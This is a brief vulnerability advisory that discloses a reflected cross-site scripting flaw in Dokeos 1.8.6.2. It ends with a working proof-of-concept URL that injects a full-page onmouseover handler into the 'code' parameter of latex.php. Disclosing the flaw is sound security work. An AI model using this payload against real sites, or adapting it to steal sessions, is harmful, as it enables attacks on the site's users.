Dokeos version 1.8.6.2 suffers from a reflective cross site scripting vulnerability.
602124acbba9ac02c1e38b89d420675af928c33221170e7891883bce59d89ae9
------------------------------------------------------------------------
Software................Dokeos 1.8.6.2
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.dokeos.com/
Release Date............2/12/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in Dokeos 1.8.6.2 can
be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)